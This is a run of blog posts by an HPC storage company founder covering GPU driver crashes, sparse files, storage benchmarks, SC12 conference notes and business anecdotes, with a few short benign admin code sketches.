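With binary units this works out to roughly 44 s per TB and about 44.8k s (a bit over 12 hours) per PB, in line with the “40 seconds or so” and “1/2 a day” estimates; decimal units would shave a few percent off each.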
Posts
Doing something I've not done in a long time ...
… buying a non-NVidia GPU product. Specifically the ATI FirePro W5000 for my desktop. I need to see if this is any more stable than the NVidia GTX series products. Feedback from customers running various flavors of Fermi, Kepler, Tesla, … suggests that the problem that was reported to me, that I’ve run into, is fairly widespread. It looks like a particular version of the driver (295.33) may not trip this problem.
Posts
NVidia crashing x server madness
I’ve been having a problem with a newly installed Mint 14 machine. A customer has been having this problem with a Scientific Linux 6.x machine. Some time after lighting up the machine, and usually after using an OpenGL application, the NVidia driver effectively hard locks, dumping error messages like this into the system logs.
[ 5444.863396] NVRM: Xid (0000:85:00): 13, 0003 00000000 00000000 00000ff4 0f000000 00000000
[ 5444.867446] NVRM: Xid (0000:85:00): 9, Channel 00000003 Instance 00000000 Intr 00000010
[ 5444.
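When chasing this kind of hang across several machines, it helps to pull the Xid events out of the logs mechanically. A minimal sketch that extracts the PCI bus ID and Xid code from lines shaped like the ones above; the regex and the `xid_events` helper are illustrative assumptions, and what each Xid code means is left to NVIDIA’s own documentation.

```python
import re

# Matches lines such as:
#   "[ 5444.863396] NVRM: Xid (0000:85:00): 13, 0003 ..."
# capturing the PCI bus ID and the numeric Xid code.
XID_RE = re.compile(r"NVRM: Xid \(([0-9a-fA-F:.]+)\): (\d+),")

def xid_events(lines):
    """Yield (pci_id, xid_code) for every NVRM Xid line found."""
    for line in lines:
        m = XID_RE.search(line)
        if m:
            yield m.group(1), int(m.group(2))

if __name__ == "__main__":
    sample = [
        "[ 5444.863396] NVRM: Xid (0000:85:00): 13, 0003 00000000 00000000 00000ff4 0f000000 00000000",
        "[ 5444.867446] NVRM: Xid (0000:85:00): 9, Channel 00000003 Instance 00000000 Intr 00000010",
        "an unrelated, made-up log line that should not match",
    ]
    for pci, code in xid_events(sample):
        print(pci, code)
```

In practice you would feed it `dmesg` output or the system log, then count codes per bus ID to see whether one card or one code dominates.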
Posts
Precision in languages
I’ve talked about precision in previous posts quite a while ago. I had seen some interesting posts about Javascript, which suggested that it was not immune to the same issues … if anything it was as problematic as most other languages, and maybe had a little less “guarding” the programmer against potential failure modes. This is not a terrible problem, I just found it amusing. Understand that I actually like Javascript.
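The classic demonstration is the same in JavaScript and Python, because both use IEEE 754 double precision for ordinary floating-point numbers. A minimal sketch:

```python
import math

# 0.1, 0.2 and 0.3 have no exact binary representation in a double.
a = 0.1 + 0.2
print(a)                     # 0.30000000000000004
print(a == 0.3)              # False
print(math.isclose(a, 0.3))  # True: compare with a tolerance instead

# Doubles have a 53-bit significand, so integers stop being exact past 2**53
# (JavaScript's Number.MAX_SAFE_INTEGER is 2**53 - 1).
big = float(2 ** 53)
print(big + 1 == big)        # True: 2**53 + 1 rounds back to 2**53
```

One difference worth knowing: Python’s `int` is arbitrary precision, so `2**53 + 1` stays exact as long as it never becomes a float, whereas a plain JavaScript number is always a double (exact big integers need `BigInt`).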
Posts
Game over, and thank you for playing
Remember this?
Can we all just finally admit that not only isn’t it secure, but you can drive a semi truck through its security holes? Unfortunately, many of the kvm-over-ip stacks still use it. So you have these embedded web services things to talk to your java client, your horrifically insecure java client, to ship bytes out over the network to give you console. Can we all start demanding an end to these?
Posts
Rethinking taking @americanexpress in the day job
Long backstory which boils down to this: Every time a customer tries to pay with AMEX, we have to deal with a broken/borked verification system. None of our other credit card companies have issues, just AMEX. This time, they called up and questioned whether we were legitimate. Ok. They really did. I am going to start recording my calls with them, you know, for quality, and entertainment, purposes. After 5 minutes of dealing with the rep who called us, I asked for her manager.
Posts
Tiburon updated with diskless CentOS 6.3 and Ubuntu 12.04 environments
Our cluster/cloud OS environment now has modules for CentOS 6.x and Ubuntu 12.04. The latter is the LTS system. We’ve got some other tools/bits to setup for this, including working to see if we can build an ARM based PXE booting stack. We are working on making a number of cluster/cloud file system setups as absolutely painless as possible. More later.
Posts
Comments on Javascript being the "new" Perl
This has been making the rounds on Hacker News, Slashdot and others. The author’s central thesis is that Javascript has become something akin to the swiss army knife of cool programming, though its missing bits. He then compares this to Perl. He notes:
Hot is subjective, and in a very real sense, just last year, a teenager in his bedroom not only built a very cool tool, and company, but he sold it.
Posts
Sad end to supercomputer in New Mexico
I’ve written about this before, about 6 months ago. Basically, the Encanto supercomputer in New Mexico, is being disassembled. The parts appear to be headed to universities in New Mexico, so its not a complete loss, but they will still have to pay for maintenance and power/cooling. What I had written before
may be summarized as “there are no silver bullets” to economic growth and prosperity. There are no magic stimuli that automatically return profits atop principal for investment purposes.
Posts
Is 2013 the year that 10GbE finally breaks out to mass adoption?
For years, we’ve been hearing how this year (for all values of this year) is the year 10GbE takes off. I’ve commented on this a number of times, from the context of 10GbE breaking out in clusters, 10GbE killing off infiniband, etc. Looking back, these comments extend 6+ years into the past. The point I have always argued as being the most important, has been cost per port. Well, the technical press noted this today.
Posts
More M&A ... Nexsan snarfed by ... Imation?
Ok, I didn’t quite see this one coming. Really. Honestly, I’ve not paid much attention to Imation in a fairly long time. I do remember tape drives and systems attached to parallel ports from them. I might even have one in my basement somewhere. Nexsan is an array vendor. For those not in the know, the array business is in a slow motion collapse; dumb arrays and associated storage targets aren’t a growth area.
Posts
I have joined the dark side
There is now a Mac Mini on my desk. It is named neutrino. It is light. This isn’t getting rid of my Linux machine(s) by any stretch. And having used neutrino for a day and change now, I note a few things. This list might make some howl in derision, but these are my observations.
The default fonts and font setup on Mountain Lion is execrable. I mean, really really horrible.
Posts
This has been another banner year for the day job
For the last 4 years, we’ve had significant year over year growth. We set records every year. 2 years ago was a barn stormer of a year. Last year reset the definition of barn storming for us. And this year. Yes, this year. I’ve hinted that we were following a hard/fast growth path. Some folks who read this know the trajectory we are on. 38% growth over last year. Which was 60% growth over the year before.
Posts
OT: Helping a good cause
A few months ago, we had a new addition to our family. This is Captain, and he is what is called a rescue dog. The organization that rescued him doesn’t have that as their primary mission; they build shelters and provide food for dogs who are chained up outside. Our Captain was one such. He was badly abused, and 4 months later, has major trust issues, and bad nightmares. He has recovered from the physical abuse.
Posts
SC12 video
If you haven’t figured it out, I’ve been busy. This is the very good sort of busy. Rich at InsideHPC.com (you read this, right? Regularly? Right? You should if you don’t) did a whole set of interviews at SC12. There’s some very cool stuff in them. Here’s ours. I’ll tell you the funny stuff at the end.
So this is like 8:30am. I’ve not had my coffee, so my brain is stuck in POST mode, and I am subject to race conditions (mouth stumbling ahead of single brain cell that might be awake).
Posts
sparse file WTFs on Linux
Create a big file …
[root@jr5-lab test]# dd if=/dev/zero of=big.file.1 bs=1 count=1 seek=1P
1+0 records in
1+0 records out
1 byte (1 B) copied, 0.000159797 seconds, 6.3 kB/s
[root@jr5-lab test]# ls -alF
total 4
drwxrwxrwx 2 root root 23 Dec 19 17:33 ./
drwxr-xr-x 6 root root 73 Nov 6 11:07 ../
-rw-r--r-- 1 root root 1125899906842625 Dec 19 17:33 big.file.1
[root@jr5-lab test]# ls -alFh
total 4.0K
drwxrwxrwx 2 root root 23 Dec 19 17:33 .
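What `dd` did here is seek 1P (2⁵⁰ bytes) past the start of an empty file and write one byte, which is why `ls` reports 1125899906842625 = 2⁵⁰ + 1 bytes while `total` shows almost nothing allocated: the skipped range is a hole. A minimal Python sketch of the same trick, using a 1 GiB offset rather than 1 PiB so it stays within common filesystem file-size limits; the helper names are hypothetical, and the allocated-size check assumes a filesystem that supports sparse files (ext4, XFS, tmpfs and btrfs all do).

```python
import os
import tempfile

def make_sparse(path: str, offset: int) -> None:
    """Similar in spirit to: dd if=/dev/zero of=path bs=1 count=1 seek=offset
    Seek past the end of an empty file and write one byte; the skipped
    range becomes a hole that sparse-capable filesystems do not allocate."""
    with open(path, "wb") as f:
        f.seek(offset)
        f.write(b"\0")

def sizes(path: str) -> tuple[int, int]:
    """Return (apparent size, allocated bytes); st_blocks counts 512-byte units."""
    st = os.stat(path)
    return st.st_size, st.st_blocks * 512

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "big.file.1")
        make_sparse(p, 2 ** 30)          # 1 GiB offset instead of 1 PiB
        apparent, allocated = sizes(p)
        print(apparent, allocated)
```

The apparent size is what `ls -l` shows; the allocated size is what `du` (and the `total` line) reflects. Tools that read the file naively will still see the full apparent length of zeros.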
Posts
Microsoft OSes will likely be losing OpenMPI support
I’d been holding off on posting anything on this for a while to see if any group steps up to support it. It looks like this is simply not happening. One shouldn’t infer anything about the Microsoft platforms w.r.t. HPC as a result of this one case. However, in light of the absorption of the HPC group into the larger server group, and other reorganizations, it’s hard to draw a positive conclusion about the longevity of Microsoft’s HPC efforts.
Posts
The downside to social media
… there are SOOO MANY things to update, pay attention to … Yeah, it’s heaven for those of us blessed with ADHD (squirrel!), but it takes away time from important things. And of course, there is at least a little irony in blogging about this and having it auto-tweeted. The world doesn’t need more social media.
Posts
Wondering aloud
Call this a hypothesis based upon observation. It’s harder for smart people to admit they are incorrect about something, than it might be for the population as a whole. My rationale works like this … the smarter you are, the more defensive you are of that ‘status’ if you will, and so you tend to act in a way to reinforce prior decisions, regardless of their actual (quantifiable) correctness. That is, you are more afraid of the consequences of admitting to being wrong, as compared to actually being wrong.
Posts
It’s getting near time for the obligatory Led Zeppelin reference ...
Last year, it was What Is and What Should Never Be. I took some liberal artistic license with the title, and altered its meaning. But the song itself is about thinking about a brighter future.
My family was just getting started down the path of a cancer diagnosis and treatment. My wife was diagnosed, and without explaining precisely why, the doctors urged us to move rapidly. I think we understand now, why they did.
Posts
That was the easiest update ... evuh ...
Wordpress before 3.5 to Wordpress 3.5. 1 button click. 1. Count em. 1. Uno. No dos. I am going to take that lesson to heart. One button.
Posts
Updated DeltaV4 quick benchies
Streaming reads and writes. Far beyond memory/cache/… all spinning disk. Remember, this is our “slow” storage.
[root@dv4-1 ~]# df -h /data
Filesystem Size Used Avail Use% Mounted on
/dev/md2 55T 65G 55T 1% /data
Run status group 0 (all jobs):
  WRITE: io=65505MB, aggrb=1467.7MB/s, minb=1467.7MB/s, maxb=1467.7MB/s, mint=44633msec, maxt=44633msec
Run status group 0 (all jobs):
   READ: io=65412MB, aggrb=1814.5MB/s, minb=1814.5MB/s, maxb=1814.5MB/s, mint=36050msec, maxt=36050msec
Posts
I am guessing they don't get it ...
I wrote this some time ago.
This is even more true this year than last. So when people call me up and try to tell me of the glamour of working for another company, they need to take this into consideration. But they don’t. So they call all the extensions on our phone. And leave messages for everyone. Um … yeah. We are growing, much faster than I had anticipated. We are actually on a real live hockey stick revenue curve.
Posts
Our cloudy future
So I just dealt with a hack on the @sijoe twitter account. And I went through a process of re-locking everything down. What occurs to me, is that this is our cloudy future. Where resources could be effectively stolen from us, say CPU cycles and storage, not merely hacking useless social media sites, by fairly determined hacking groups. Think about this for a moment. You have a large allocation on EC2 for some reason, and your account gets hacked.
Posts
Well, that was fun
Somehow/somewhere, the @sijoe twitter account was compromised, and a bad tweet generated. I deleted the tweet. Then revoked all access to twitter from all accounts. Then made sure I’ve got two factor authentication up everywhere possible. Then changed all passwords on all accounts. Are we having fun yet? Somehow, I have a sense that this is our computational future. I’ll elaborate on this shortly. Let me finish hooking up the newly re-secured bits to each other (well, a more limited version of this …) And no, I wasn’t able to identify the culprit vector.
Posts
What we've been working on for the past several months
… I still can’t talk about it publicly, until everything is live, and I get the OK. But it is awesome, and it’s a pleasure to work with the large extended team we are working with. And yes, this is killing me. I love to talk about cool stuff.
Posts
I can't believe it's been one year since I wrote this
This post.
That was written in the late evening of the 29th of November 2011. Today is the 1 year anniversary of that visit. Chris Samuel (@chris_bloke) and his wife went through a similar event somewhat before we did. And he pointed out this XKCD to everyone on his twitter feed. We got our surgical slot quickly, I believe we were given priority. Not sure why, but the post-operative analysis indicated that the cancer had broken out of the duct, and was growing rapidly.
Posts
Initial results for 60 bay unit running a software RAID
Our new JackRabbit tightly coupled storage and computing unit is on the test track, and about to go out the door to a customer. Need a few minutes with it, after quick tuning to generate some performance data. This is a single 4U server unit with 1/4 PB within it. Streaming 1TB from disk. This is using our tuned software RAID6. Our hardware accelerated RAID results will be generated later in the next batch of tests with new units we are building.
Posts
Learning limits of Linux distribution infrastructure
It’s only when you stress a distribution infrastructure that you truly see its limits. And as often as not, the fail winds up being widespread. Our new 60 bay JackRabbit unit with CentOS 6.3 on it … and this is not a bash at CentOS, they do a great job rebuilding the Red Hat distribution without the copyrighted bits … has a number of software RAID elements on it. 9 in the current test.
Posts
ICL (IPMI Console Logger) update
Ok, this took me forever to get this done. But, I’ve had inquiries from a large number of people/companies, so here it goes: Have a looksy at the repo here. This is the older code, with a single host at a time (plumbing is for many many hosts at once), with no triggers. That code is about a week away (I don’t like committing broken code). For what it’s worth, this is going to be used at scale in one of our projects.
Posts
Controversy in the kernel
Referring to this article, it appears that there is some issue with an important subsystem in the Linux kernel. The SCSI target code, specifically the new implementation pulled in by James Bottomley, is the LIO framework based upon work of Nicholas Bellinger and Rising Tide Systems. This was chosen over the SCST implementation, which continues to soldier on. We did have a dog in that race, and would have preferred to have seen SCST included due to our familiarity with it.
Posts
Post SC12: some thoughts and updates
That was our best SCxy show. Ever. Inclusive of all 17-ish years I’ve attended (getting to be something of a geezer I guess). The 60 bay JackRabbit system got lots of attention. That we are putting the Calxeda backplane and energy cards in, come January time frame, brought many people in to talk about this. Big data was one of the huge topics. I’ve been saying Big Data is not just Hadoop.
Posts
SC12 panel on big data
Listen to their definition between 3 and 6 minutes in.
The storage performance and IO performance, and networking is extraordinarily critical to these problems. Which has been the set of problems we’ve been focusing on for a long time. Also worth noting that Addison Snell nails it on HPC and big data relationships. They are debating definitions and other aspects, but at the end of the day, the idea is that HPC has been a set of techniques, designs, and platforms upon which we’ve been banging on big data problems for decades.
Posts
And it’s over till SC13 ...
Upfront: This was the best SC conference we have ever participated in. From an interest level, traffic level, and various meetings with partners, customers, and others. And to the folks who might be reading this whom we missed, or had to cut short conversations due to timing, please feel free to call/email us. We are reachable via the usual methods. Everyone marveled at the 60 bay chassis. Oddly enough, I never had time to set up the benchmarks on it.
Posts
SC12 day 1
Ok, beobash rocked. As usual, Lara at Xandmarketing and Doug Eadline did an absolutely awesome job. For those I bumped into, hello again. I apologize if I didn’t spend more time with you … especially my readers … I was operating on fumes at that point. Please don’t hesitate to introduce yourself during the day at the booth (4154) at SC12. Got up early, got into the booth, did an interview video with Rich B at InsideHPC.
Posts
On the test track: New JackRabbit, open the throttle wide ...
I know, I know, I really should wait until the drive build is done. I know I should do that.
[root@Mjölnir ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/md0 89G 6.8G 77G 9% /
tmpfs 127G 0 127G 0% /dev/shm
/dev/sdc 48T 393G 47T 1% /data/3
/dev/sdb 48T 395G 47T 1% /data/2
/dev/sdd 33T 367G 33T 2% /data/4
/dev/sda 48T 374G 47T 1% /data/1
I called it Mjö…
Posts
The joys of running one's own mail server
Minor issue. We changed IP addresses at work recently. A larger block of public facing IPs for more functionality. And in doing so, we updated almost everything correctly. Yes, almost everything. Almost. Everything. The one, minor … trivial … thing we left unchanged … broke our support site sending reply emails correctly. They were rejected about 50% of the time, as they came in on the wrong port/ip. So for the last week we’ve been sending extra emails.
Posts
Heavily armed rabbits
Saw this blog post with a cartoon in it.
[ ](http://www.rscottillustration.com/image/lucky-rabbits-foot)
Those are armed rabbits. Sorta like JackRabbits. And that might not be the only definition of “ARMed” out there. Heavily ARMed JackRabbits. Not that I’m hinting at anything. Maybe people should just visit our booth 4154 at #SC12 …
Posts
Where I come from ...
… this is called being a mensch. Well played Michael Ferns, well played (in a respectful way). And welcome to Michigan and the Wolverines.
Posts
Fads, waves of the future, etc.
Fads are standing waves of marketing/sales/technology that have limited lifetime, yet generate buzz. Fads die out, and they consume resources during their existence. Fads rarely ever do more than help cull the herd … assisting evolutionary processes that weed out crappy technology dressed up nicely and packaged for sale. Best example of these I can come up with were the cycle stealing codes, that turned your machine into a “supercomputer” by aggregating cycles across many hundreds and thousands of machines.
Posts
Not good
Rich B at InsideHPC.com posts about the national labs’ exit from floor space at SC12. The stated reason is budget cuts, but the GSA scandal and its fallout likely carry more weight with the upper echelon of decision makers. If you think about it for even a minute, you realize this is the very definition of the cliché about cutting off one’s nose to spite one’s face. To any decision makers out there: this is the wrong thing to do.
Posts
Ultradense and fast JackRabbit coming next week
I don’t know that we’ll be able to get enough 4TB drives for all the units. We’ll talk about it some more at SC12, and should have a few units with 4TB, 3TB, and possibly 2TB drives in them. For those who aren’t aware, our JackRabbit unit is already the fastest spinning disk single server in the market that we are aware of. It’s dense, up to 144TB in a 5U container.
Posts
On the money
Charles Stross (@cstross) is one of my favorite writers. We have wildly different views on things, but I like his writing, and his very clear thinking and story telling. Which is why I have to say that this blog post puts a nice context box around some of the things we hear about “saving the planet.” Something akin to this has been running around my head for a while, but not nearly as elegantly put.
Posts
Oh joy ... a crash on our Amazon EC2 hosted web server
[update 2] Yuppers, Amazon US East N. Virginia is experiencing issues. C.f. here.
Doug thought I did this with our IP update (larger block of static addresses). So did I, for a moment, until I logged in. Partial failure on my part for not having the backup live/ready. Will remedy over the next day or two.
[update] I think we can call this one a #fail.
Imagine if some small business with no technical acumen, sold on the “push this button to run your website” pitch, saw that error message.
Posts
AMD has an SGI moment
$131M quarterly loss. They have a looming 15% (think roughly one out of every seven) RIF. I remember those from SGI days. I remember being on an ACS show floor, giving demos, and learning that some of my colleagues on the show floor with me were part of the RIF. SGI itself isn’t doing well, but that’s a story for another time. I still have lots of friends at AMD. Folks I’ve worked with and respect highly.
Posts
Initial plans for SC12
Assuming all the hardware is ready … not sure, but hopefully it will be. We’ll have a siCluster at the booth, powered by a partner’s 10/40GbE fabric and running a few different cluster file systems. FhGFS is a no brainer, it will be on there. Ceph should be on there. GlusterFS should be on there. Thinking about Lustre; we may do this via our presentation layer, so we can avoid dealing with the pain of hyperspecialized kernels and specific hard distro revision requirements.
Posts
Beta version of FhGFS: now with mirror capability!
One of the best parallel file systems just got better. FhGFS now has content mirroring (client and server side!) as well as other nice improvements! We’ve used the preceding release on our siFlash unit. I’ve not shared the results publicly to date, but suffice it to say that the performance was absolutely stellar (it helps that siFlash is the fastest 4U SSD/Flash tightly coupled computing and storage array in market). We are planning out our SC12 booth now.
Posts
Growth
I’ve hinted a little at what’s going on, but I haven’t come fully clean yet. Will do soon. I promise, though likely it will be public after SC12. Suffice it to say that the company is on a track to grow significantly in the near term. No, this is neither a capital raise, nor an acquisition. We have a practical problem. We’ll be setting up an office in NJ/NY area to serve our customer base there, and we will need extremely good technical and support people, along with some of the other folks we plan to put there.
Posts
Update on the scammers spoofing our number
We’ve started following an interesting suggestion made to us. It involves some cost, but it’s got the nice side effect of providing us (eventually) with the call data records from the phone company. Assume we will be getting the information we need, soon, to deal with this. We have a potent legal cocktail waiting for this information. Of course, the scammers decided to step things up a bit. One claimed to be with the FBI.
Posts
Updated configs for storage
Had neglected to mention this, but all of the day job’s units support 4TB drives. This means you can get 4U goodness up to 96TB, 5U goodness up to 192TB, and very soon (and we’ll start taking early orders for it) 4U with up to (about) 1/4 PB directly coupled to a very fast computer, with incredible amounts of IO and network bandwidth. Full 42U rack with about 2.5PB raw, and about 40GB/s sustained streaming write, and 60GB/s sustained streaming read performance in aggregate.
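Here is a back-of-envelope check of these figures as a Python sketch. Several inputs are assumptions rather than figures from this post. The drive counts are inferred by dividing capacity by 4TB. The 256TB raw figure for the dense 4U unit is taken from the “4U, 256TB raw” unit in the “Just configured a new generation storage unit” post. The rack is assumed to hold ten 4U units, with the remaining 2U left for switching.

```python
# Capacity and bandwidth arithmetic for the configurations above.
# Assumptions: drive counts = raw TB / 4TB; dense 4U unit = 256TB raw;
# a 42U rack holds ten 4U storage units (2U left for switches).
DRIVE_TB = 4

configs = {"4U": 96, "5U": 192, "4U dense": 256}  # raw TB per chassis
for name, raw_tb in configs.items():
    print(f"{name}: {raw_tb // DRIVE_TB} drives x {DRIVE_TB}TB = {raw_tb}TB")

units_per_rack = 42 // 4                 # whole 4U units that fit in 42U
rack_raw_pb = units_per_rack * 256 / 1000
print(f"rack: {units_per_rack} units, {rack_raw_pb:.2f}PB raw")

# Each unit's share of the stated aggregate streaming rates.
write_gbs, read_gbs = 40, 60
print(f"per unit: {write_gbs / units_per_rack:.1f}GB/s write, "
      f"{read_gbs / units_per_rack:.1f}GB/s read")
```

Under these assumptions, the sketch gives 2.56PB raw per rack and about 4GB/s write and 6GB/s read per unit. That is consistent with the “about 2.5PB” and 40/60GB/s aggregate figures.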
Posts
Scalable Informatics at SC12 in Salt Lake City
Bigger booth this year, number 4154 (10x20) … last year was WAY too cramped. Planning stuff … keeping it simple if possible. Maybe a minirack with a siCluster … thinking about this hard. Definitely a dense storage system, an insanely fast storage system. Probably some streaming stuff, and pounding on IO similar to what we did at HPC on Wall Street. Will probably have a few partners with us (and their bits) in the booth.
Posts
memtest delenda est
Ok … maybe not so much destroyed. More like “ignored as a reasonable test of anything but DIMM visibility and very basic functionality”. Memtest has several variants running around, all of which purport to hammer on, and detect, bad RAM. The only problem is, it doesn’t really work well, apart from trivial cases. That is, if you have an iffy DIMM, you’d need days/weeks/months of testing with memtest to catch it, whereas putting it in a box and running a hard-pounding code on it exposes it much sooner.
Posts
Response to the 11+ GB/s unit was ... incredible ...
We showed two large speedometers, one with Bandwidth, one with IOPs. These measured their data right off the hardware (via the device driver and block subsystem mechanisms). First, we ran a fio test with 96 threads reading 1.1TB of data in total. This took about 100 seconds or so. Second, we ran a fio test with 384 threads randomly reading 8k chunks of data out of that 1.1TB. Left them in a loop, with a big speedometer pair on the screen.
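The arithmetic behind the sequential run is shown below as a short Python sketch. It assumes 1.1TB means 1.1e12 bytes and treats “about 100 seconds” as exactly 100, so the results are approximate. The helper for the random 8k run assumes “8k” means 8192 bytes.

```python
# Sequential run: 96 threads read 1.1TB in total in about 100 seconds.
# Assumptions: 1.1TB = 1.1e12 bytes; "about 100 s" taken as exactly 100 s.
TOTAL_BYTES = 1.1e12
SECONDS = 100
THREADS = 96

bandwidth_gbs = TOTAL_BYTES / SECONDS / 1e9      # aggregate GB/s
per_thread_gb = TOTAL_BYTES / THREADS / 1e9      # data each thread reads
per_thread_mbs = bandwidth_gbs * 1e3 / THREADS   # each thread's share, MB/s

print(f"aggregate: {bandwidth_gbs:.1f} GB/s")    # aggregate: 11.0 GB/s
print(f"per thread: {per_thread_gb:.2f} GB at ~{per_thread_mbs:.0f} MB/s")


def iops_from_bandwidth(bytes_per_sec: float, block_bytes: int = 8192) -> float:
    """For fixed-size random IO, IOPs is bandwidth divided by block size.

    The 8192-byte default assumes the post's "8k" means 8 KiB.
    """
    return bytes_per_sec / block_bytes
```

The two speedometers are linked: for a fixed block size, a bandwidth reading implies an IOPs reading and vice versa.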
Posts
Tiburon again saves the day
Useful code (i.e. code == program) has a tendency to save you lots of pain when other solutions fail you. Powerful code lets you do things that lesser codes mess up. Intelligently designed and written codes let you debug them, and their operational impacts, easily and quickly. None of these qualities describes grub. Grub is … well … grub. If you have to deal with it on a daily basis, you understand what I mean by this.
Posts
turning siFlash past 10 (GB/s that is) ...
Yeah, that title is a Spinal Tap homage. We are bringing a new siFlash unit to the HPC on Wall Street conference. This uses our new chassis, an updated kernel, and lots of tuning. Still have much more work to do … but it’s probably good enough to ship now. I ran a few quick speed drills on it: 4.2 GB/s streaming write, and 10.7 GB/s streaming read with 96 simultaneous processes.
Posts
IPMI Console Logger is born
Here’s the problem I am trying to solve; call it a years-long itch I’ve been wanting to scratch. We build very high performance storage clusters, extreme performance flash and SSD arrays, and a number of other things. At customer sites, while in use, a unit could crash. When it does, we really need a full console log to see the complete crash trace. Unfortunately, the “write to the screen” method gets very … very old when you are trying to transcribe something … that’s scrolled off the screen.
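The Python sketch below shows one way to approach this. It is not the logger described in the post. It assumes the BMC supports Serial-over-LAN through `ipmitool` (`sol activate` over the `lanplus` interface), and the host, credentials, and log path are placeholders. The idea is to timestamp every line the console emits and flush it to disk, so nothing is lost to scrollback.

```python
import datetime
import subprocess
from typing import Iterable, TextIO


def log_console(lines: Iterable[str], out: TextIO) -> int:
    """Write each console line to `out` prefixed with a UTC timestamp.

    Flushing after every line keeps the crash trace on disk even if the
    logger is killed mid-stream. Returns the number of lines written.
    """
    count = 0
    for line in lines:
        stamp = datetime.datetime.now(datetime.timezone.utc).isoformat()
        out.write(f"{stamp} {line.rstrip()}\n")
        out.flush()
        count += 1
    return count


def sol_command(host: str, user: str, password: str) -> list[str]:
    """ipmitool Serial-over-LAN invocation; all arguments are placeholders."""
    return ["ipmitool", "-I", "lanplus", "-H", host, "-U", user,
            "-P", password, "sol", "activate"]


def run_logger(host: str, user: str, password: str, path: str) -> None:
    """Attach to a BMC's SOL console and append everything to `path`."""
    with subprocess.Popen(
        sol_command(host, user, password),
        stdout=subprocess.PIPE, text=True, errors="replace",
    ) as proc, open(path, "a", encoding="utf-8") as log:
        log_console(proc.stdout, log)
```

Keeping `log_console` separate from the `ipmitool` process makes the logging part testable, and it can be reused with any other console source.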
Posts
Not even wrong
There’s a story about Wolfgang Pauli: another physicist gave him a dubious paper to look over, to get his opinion. Pauli, ever the critic, remarked about the paper something akin to this: “That is not only not right, it is not even wrong.”
This is a way of saying that there are failures so deep, so fundamental, that one cannot get past them to deal with the basic issues of the underlying theory. If the fundamentals are off, there is no possible way that the theory could remain intact.
Posts
slight change to site: comments
We’ve been getting spammed. So I am now requiring comment submitters to have a previously allowed comment to be able to comment without issue. I hate doing this, but I don’t want this to become yet another waste of bits, lousy with comment spam. If this doesn’t work, I’ll change it to require user login to comment. [update] Since making the change, no spam has made it through, though they have tried.
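The moderation rule described above can be sketched in Python. Keying authors on a normalized (name, email) pair is an assumption for illustration. It does not reflect how any particular blog engine implements this.

```python
from dataclasses import dataclass, field


@dataclass
class Moderator:
    """Hold a comment unless its author already has an approved comment.

    Authors are identified by a lower-cased, stripped (name, email) pair;
    that identity rule is an illustrative assumption.
    """
    approved_authors: set[tuple[str, str]] = field(default_factory=set)

    @staticmethod
    def _key(name: str, email: str) -> tuple[str, str]:
        return name.strip().lower(), email.strip().lower()

    def submit(self, name: str, email: str) -> str:
        """Return 'published' for known-good authors, else 'held'."""
        return "published" if self._key(name, email) in self.approved_authors else "held"

    def approve(self, name: str, email: str) -> None:
        """Record a manual approval, so future comments go straight through."""
        self.approved_authors.add(self._key(name, email))
```

A spammer’s first comment always lands in the moderation queue. Only a human approval opens the door.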
Posts
An avulsion fracture of 4th finger on left hand
This is what I get for sparring with 13 year old black belts … sigh … starting to feel old :( Splint, ibuprofen, and no sparring for a while (I could do 1 hand and 2 feet, but that requires a far larger ego than I have, not to mention some brass ones … which I can’t say I have relative to my sparring abilities). Probably can’t handle my bo either.
Posts
OT: A plea for help
We have a problem. Some company has spoofed our telephone number for their caller ID, and has been calling people, harassing and threatening them. We get calls from many very pissed off people, and I have to explain the situation to them. Usually it’s one per week. We took 5-6 calls about this just today. Ok. Gotta stop this. The folks doing this drag our name through the mud every time, as they misrepresent themselves as us by using our phone number.
Posts
[updated at bottom] Apparently there are people this profoundly ... well ... see for your self
At first I was ready to discount this as “entrapment” or something like gonzo journalism. But … it’s … not … A plain and simple question, nothing complex: should we ban corporate profits? What is astounding, or horrifying, is the location where it is being asked, and the seemingly normal people happily espousing what is basically a ridiculous concept.
Here is my take on this. First off, Peter Schiff is something of a notorious guy.
Posts
Going over some old records
… and I ran across a situation where we helped out a customer, and we were screwed over after they decided not to pay a part of their bill. They don’t deny they owed it. They just didn’t want to pay it. And the hard part, being that they were out of country, in a different jurisdiction, there is little we could do. This is part of bleeding when you build a business.
Posts
Excellent read on statistics and how people misuse it
Link is here. I cannot tell you how many times I’ve had a conversation with a researcher, when we talk about statistics, and they quote me some high correlation coefficient as being evidence of causality. Any physical scientist, chemist, engineer, … knows that you have to treat correlation coefficients very carefully, and you cannot substitute these for a real causal relationship with a backing theory that provides a testable model. That is, the causal relationship is fundamentally an aspect of the theory, with the latter able to guide you on making predictions.
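Here is a small Python illustration of the point. The two series are made up and share nothing except an upward drift over the same periods, with time acting as a common driver. They still produce a very high correlation coefficient, even though neither causes the other by construction.

```python
import math


def pearson(xs: list[float], ys: list[float]) -> float:
    """Pearson correlation coefficient of two equal-length series."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = math.sqrt(sum((x - mx) ** 2 for x in xs))
    sy = math.sqrt(sum((y - my) ** 2 for y in ys))
    return cov / (sx * sy)


# Two made-up series: each is a trend over the same 10 periods plus its
# own small wiggle. Neither series is computed from the other.
periods = range(10)
series_a = [100 + 5 * t + (1 if t % 2 else -1) for t in periods]
series_b = [3.0 + 0.2 * t + (0.05 if t % 3 == 0 else 0.0) for t in periods]

r = pearson(series_a, series_b)
print(f"r = {r:.3f}")  # close to 1, yet there is no causal link
```

The high `r` only says the two series move together. Explaining why takes a theory that makes testable predictions, and here that theory would be “both grow with time”.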
Posts
I had a sense this would work out well
As I noted in an earlier post, Joyent had discontinued an aging service, but one which many people had bought into, with the promise of “forever” service. I pointed out that in this sense, forever couldn’t mean, in a literal sense, forever … But I had also suggested that they would likely try to find a way to make the transition better for people. And they did.
This is a perfect illustration of how to handle these transitions.
Posts
Brittle, poorly designed pipelines
One of the more powerful aspects of cluster and cloud computing is the effective requirement for building in fault tolerance of some sort, to a computational pipeline. You have to assume, in a wide computation scenario, that some aspect of your system may become unavailable. Which means you need a sane way to save state at critical points in your workflow. You need sane distribution and management of the workflow. You need to be able to route around errors.
